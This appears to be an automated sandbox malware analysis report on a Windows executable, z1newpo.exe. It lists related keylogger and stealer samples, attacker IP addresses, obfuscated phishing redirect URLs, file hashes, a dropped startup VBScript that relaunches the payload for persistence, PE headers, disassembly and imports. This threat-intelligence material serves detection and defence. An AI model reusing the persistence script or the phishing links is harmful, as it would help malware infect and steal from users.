                                                  Quotation 47923.exeGet hashmaliciousSnake Keylogger, VIP Keylogger, XRedBrowse
                                                  • 132.226.247.73
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.8.169

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  TELEGRAMRUrNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                  • 149.154.167.99
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 149.154.167.99
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 149.154.167.99
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 149.154.167.99
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 149.154.167.99
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 149.154.167.99
                                                  Order #SS1953pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 149.154.167.220
                                                  SWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 149.154.167.220
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  PUBLIC-DOMAIN-REGISTRYUSQuote 20240533-REV2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 199.79.62.115
                                                  Invoice Payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.199.224
                                                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bp%C2%ADri%C2%ADvi%C2%ADl%C3%A8%C2%ADge%C2%ADt%C2%ADv.%E2%80%8Bf%C2%ADr%2Fddd%2Fopc%2FESwvA1jmTcm6YlLT8cDALmb3/cGxvdHRlYm9yZC5ub0Bwb3N0bm9yZC5jb20=Get hashmaliciousUnknownBrowse
                                                  • 116.206.104.99
                                                  Shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.251.85.202
                                                  PO- 220135.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 199.79.62.115
                                                  z47TTSWIFTCOPY.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.223
                                                  https://www.google.com/url?q=https://www.google.com/url?q%3D6svi1oMcTV0NeHiFXfMT%26rct%3DymEXS3GcN1kzd29f90Jh%26sa%3Dt%26esrc%3DMKuZSwa3VscPTAKnZxUY%26source%3D%26cd%3DmuCyjHwItCeuxIlcZYQK%26cad%3DwIPICxxR6hM2MjAzQktg%26ved%3DfkNU1q9O08RLJIKTIJOT%26uact%3D%2520%26url%3Damp%252Fjaldirummy%252Ecom%252F.rice%252F&source=gmail&ust=1726134371821000&usg=AOvVaw3eh4rUjLydKAIWROEb78Zn#9K9BYE-SUREBOOTbWljaGFlbHNjb2ZpZWxkQGRpc25leS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                  • 204.11.58.94
                                                  Quote_4400201477.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 199.79.62.115
                                                  Shipping doc.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.251.85.202
                                                  https://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/45834840-3c14-4374-8f51-bbcadebab762?j=eyJ1IjoiNGRnZ2x2In0Get hashmaliciousHTMLPhisherBrowse
                                                  • 103.53.40.62
                                                  UTMEMUSrNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.8.169
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 132.226.247.73
                                                  Quotation 47923.exeGet hashmaliciousSnake Keylogger, VIP Keylogger, XRedBrowse
                                                  • 132.226.247.73
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.8.169
                                                  Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.8.169
                                                  Dekont_20240917_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.8.169
                                                  ship particulars_M.V FAROUK M.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  TVY67438038-GH93GHDBHSJUJS-PLS7838WU0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 132.226.8.169
                                                  hesaphareketi-01_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  Quotation QT-433.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.8.169
                                                  CLOUDFLARENETUSrNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.97.3
                                                  https://demo.services.docusign.net/webforms-ux/v1.0/forms/10bc61c9dc8dd4ea79884f1c0703f644Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.25.14
                                                  https://immergut.dotling.comGet hashmaliciousUnknownBrowse
                                                  • 188.114.96.3
                                                  18092024 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.26.12.205
                                                  2723912 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.74.152
                                                  MV ALIADO - S-REQ-19-00064.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 104.26.13.205
                                                  https://abena.dotling.com/Get hashmaliciousUnknownBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                  • 104.26.3.46
                                                  https://traininngllc.zendesk.comGet hashmaliciousUnknownBrowse
                                                  • 104.18.70.113
                                                  https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wD6jzGRyycT&sa=t&esrc=6jzGRFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ1GcDqhlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fanoboy.pw%2Fojo%2Flok%2F9198595720/#a2FybC5ib25uZXJAYXR1Lmll=$%E3%80%82Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                  • 104.26.13.205

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  54328bd36c14bd82ddaa0c04b25ed9adrNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  DbwdFVTAXI.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                  • 188.114.96.3
                                                  4b8lIXw22G.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                  • 188.114.96.3
                                                  HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                  • 188.114.96.3
                                                  MT LADY YASSO VESSEL BRIEF DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  IMG_1507_1603.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  MT103 SWIFT COPY.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  SWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  3b5074b1b5d032e5620f69f9f700ff0erNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  18092024 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 149.154.167.220
                                                  2723912 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 149.154.167.220
                                                  MV ALIADO - S-REQ-19-00064.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 149.154.167.220
                                                  DbwdFVTAXI.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                  • 149.154.167.220
                                                  4b8lIXw22G.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                  • 149.154.167.220
                                                  HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                  • 149.154.167.220
                                                  Data-Sheet.jsGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  Enquiry.jsGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  Order.jsGet hashmaliciousAgentTeslaBrowse
                                                  • 149.154.167.220

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\Clinton

                                                  Download File
                                                  Process:C:\Users\user\Desktop\z1newpo.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):274432
                                                  Entropy (8bit):6.987696140164473
                                                  Encrypted:false
                                                  SSDEEP:6144:b6vq4FoG8WsShEulx8ohmxvuaYNVyMoNb72xhpBB2hogzoeCemvYewk2ogxmILyf:byq4FoGp8ohmxvuaAVnoNb72xhH4fEdL
                                                  MD5:231C98E12D2FD3D615E010A5E705DECA
                                                  SHA1:5C857C3078CF417B86B7FE2498B5C73AAAD411A9
                                                  SHA-256:92D141B7CF3C48E02FC330AAC81709DD52067B297F24A7449810B7636FE44F2F
                                                  SHA-512:BC010B4E21B7430CCCDF3D7E915DD9FBF9C97C7B302D83C673B2EE616DE93863A63C156A1BB3D8DD363846822087E4FE4D5FE37BE7C777BCFA5C0D14C551055F
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:~m.Q56151OFY..8H.28OIS37yQ66155OFYRP8HL28OIS379Q66155OFYRP8H.28OGL.99.?...4..x.8Q;lBJ .!RZ.2WX_ZAo$<r"M&l[Vo..`.T>RS.88EbYRP8HL2h.IS.6:Q.S5OFYRP8H.2:NBRc79K261!5OFYRP6qH28oIS3w=Q66q55oFYRR8HH28OIS37=Q66155OF.VP8JL28OIS17y.66!55_FYRP(HL"8OIS37)Q66155OFYRP.pH2sOIS3w=Q!&155OFYRP8HL28OIS379126=55OFYRP8HL28OIS379Q66155OFYRP8HL28OIS379Q66155OFYRP8hL20OIS379Q6615=oFY.P8HL28OIS37.%SNE55OR@VP8hL28UMS359Q66155OFYRP8Hl28/g!@EZQ66&%5OF.VP8ZL28SMS379Q66155OFY.P8.b@]#&0375Q661U1OF[RP8fH28OIS379Q6615uOF.RP8HL28OIS379Q66..1OFYRPpHL2:OLS[.;Qn.056OFY.P8N..:O.S379Q66155OFYRP8HL28OIS379Q66155OFYRP8HL28O...8..._B..OFYRP8IN1<IA[379Q6615KOFY.P8H.28O~S37.Q66\55ObYRPFHL2FOISW79QD615TOFY.P8H#28O'S37GQ66/7.oFYXz.HN..OIY3..".61?.NFYV#.HL8.MIS7D.Q6<.65OB*wP8B.68OM .79[.3151e.YQ..NL2# pS3=9R.#755Tl.RR.rL22Ocu34.D061..mF[.Y8HH.n<TS31..66;A<OF[.Z8HH.&Ma.373{.H:55KmYxrFDL2<dIy.I4Q62.5.QD._P8Lf.FAIS7.9{.H>55KmYxN:.C28KcqM'9Q2.1..1WYRT.Hf.F]IS7.9{.H"55KmYxrF\L2<dIy.I,Q62.5.m8ORP<cL..1^S33.Q..O-5OBrRz&J.*8OMy5.[QD<'5EL

                                                  C:\Users\user\AppData\Local\directory\name.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\z1newpo.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):1342755
                                                  Entropy (8bit):7.442815577239056
                                                  Encrypted:false
                                                  SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJ0eud6LfL5vSjUBMF94Z9M5:mJZoQrbTFZY1iaJ0eudejk+k9eC
                                                  MD5:C087116B5A47A54E5DD272162FD87B3B
                                                  SHA1:71EB7A31ED81367C95563F6D4AADFB6EA028B997
                                                  SHA-256:5988BA6BF97C1B33F469EDFCA96B98C35D2054F2CE49D8E065D23250A241A3D0
                                                  SHA-512:FECDFC372CCEBE22830E31A8D20050CA7A3E1B87ED1A0876DF471D20AEDAC1E3283AF624B470A20EF024F6283583629A44716197F341DCC263504DE4D19E01C4
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.......x7........................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...x7.......8...T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\directory\name.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):276
                                                  Entropy (8bit):3.4438563990029807
                                                  Encrypted:false
                                                  SSDEEP:6:DMM8lfm3OOQdUfclMMlW8g1UEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlMkXg1Q1A1z4mA2n
                                                  MD5:B4D89AA38733FBDC71944ABFA68E1E38
                                                  SHA1:33AF98BF7F8FD0F07732B44A661CBE717C314ACE
                                                  SHA-256:16E4EEB3145927B0A84AC5DA4FDC83A98D9F023BDDE346AD62035A5E633201E1
                                                  SHA-512:E8E7BACE9C5988D89FD7BF4DA6ECBBEC81A3CB4A5402F008FA6FC03C0992E68CB5ADCB19F55AC1625E9E75E9EBCE95C1573CAE3F612700181A8255F2FA7AD9B3
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.442815577239056
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:z1newpo.exe
                                                  File size:1'342'755 bytes
                                                  MD5:c087116b5a47a54e5dd272162fd87b3b
                                                  SHA1:71eb7a31ed81367c95563f6d4aadfb6ea028b997
                                                  SHA256:5988ba6bf97c1b33f469edfca96b98c35d2054f2ce49d8e065d23250a241a3d0
                                                  SHA512:fecdfc372ccebe22830e31a8d20050ca7a3e1b87ed1a0876df471d20aedac1e3283af624b470a20ef024f6283583629a44716197f341dcc263504de4d19e01c4
                                                  SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJ0eud6LfL5vSjUBMF94Z9M5:mJZoQrbTFZY1iaJ0eudejk+k9eC
                                                  TLSH:6555D021A5D290F1D1E22EB19D7AF355BA6A6D250222C19FE3C439F00A73780D7297F7
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                  File Icon

                                                  Icon Hash:cf818c848c8a814f

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4165c1
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007FF1D4E663CBh
                                                  jmp 00007FF1D4E5D23Eh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [ebp+0Ch]
                                                  mov ecx, dword ptr [ebp+10h]
                                                  mov edi, dword ptr [ebp+08h]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007FF1D4E5D3BAh
                                                  cmp edi, eax
                                                  jc 00007FF1D4E5D556h
                                                  cmp ecx, 00000080h
                                                  jc 00007FF1D4E5D3CEh
                                                  cmp dword ptr [004A9724h], 00000000h
                                                  je 00007FF1D4E5D3C5h
                                                  push edi
                                                  push esi
                                                  and edi, 0Fh
                                                  and esi, 0Fh
                                                  cmp edi, esi
                                                  pop esi
                                                  pop edi
                                                  jne 00007FF1D4E5D3B7h
                                                  jmp 00007FF1D4E5D792h
                                                  test edi, 00000003h
                                                  jne 00007FF1D4E5D3C6h
                                                  shr ecx, 02h
                                                  and edx, 03h
                                                  cmp ecx, 08h
                                                  jc 00007FF1D4E5D3DBh
                                                  rep movsd
                                                  jmp dword ptr [00416740h+edx*4]
                                                  mov eax, edi
                                                  mov edx, 00000003h
                                                  sub ecx, 04h
                                                  jc 00007FF1D4E5D3BEh
                                                  and eax, 03h
                                                  add ecx, eax
                                                  jmp dword ptr [00416654h+eax*4]
                                                  jmp dword ptr [00416750h+ecx*4]
                                                  nop
                                                  jmp dword ptr [004166D4h+ecx*4]
                                                  nop
                                                  inc cx
                                                  add byte ptr [eax-4BFFBE9Ah], dl
                                                  inc cx
                                                  add byte ptr [ebx], ah
                                                  ror dword ptr [edx-75F877FAh], 1
                                                  inc esi
                                                  add dword ptr [eax+468A0147h], ecx
                                                  add al, cl
                                                  jmp 00007FF1D72D5BB7h
                                                  add esi, 03h
                                                  add edi, 03h
                                                  cmp ecx, 08h
                                                  jc 00007FF1D4E5D37Eh
                                                  rep movsd
                                                  jmp dword ptr [00000000h+edx*4]

                                                  Rich Headers

                                                  Programming Language:
                                                  • [ C ] VS2010 SP1 build 40219
                                                  • [C++] VS2010 SP1 build 40219
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2010 SP1 build 40219
                                                  • [RES] VS2010 SP1 build 40219
                                                  • [LNK] VS2010 SP1 build 40219

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x13778.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0xab0000x137780x13800deaf8cf0ab1ab56c5b616d6567464a39False0.08774038461538461data3.8891256142087705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xab4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                  RT_ICON0xab5700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                  RT_ICON0xab6980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                  RT_ICON0xab7c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.05220040222406246
                                                  RT_MENU0xbbfe80x50dataEnglishGreat Britain0.9
                                                  RT_DIALOG0xbc0380xfcdataEnglishGreat Britain0.6507936507936508
                                                  RT_STRING0xbc1380x530dataEnglishGreat Britain0.33960843373493976
                                                  RT_STRING0xbc6680x690dataEnglishGreat Britain0.26964285714285713
                                                  RT_STRING0xbccf80x4d0dataEnglishGreat Britain0.36363636363636365
                                                  RT_STRING0xbd1c80x5fcdataEnglishGreat Britain0.3087467362924282
                                                  RT_STRING0xbd7c80x65cdataEnglishGreat Britain0.34336609336609336
                                                  RT_STRING0xbde280x388dataEnglishGreat Britain0.377212389380531
                                                  RT_STRING0xbe1b00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                  RT_GROUP_ICON0xbe3080x14dataEnglishGreat Britain1.25
                                                  RT_GROUP_ICON0xbe3200x14dataEnglishGreat Britain1.15
                                                  RT_GROUP_ICON0xbe3380x14dataEnglishGreat Britain1.25
                                                  RT_GROUP_ICON0xbe3500x14dataEnglishGreat Britain1.25
                                                  RT_VERSION0xbe3680x19cdataEnglishGreat Britain0.5339805825242718
                                                  RT_MANIFEST0xbe5080x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                  Imports

                                                  DLLImport
                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
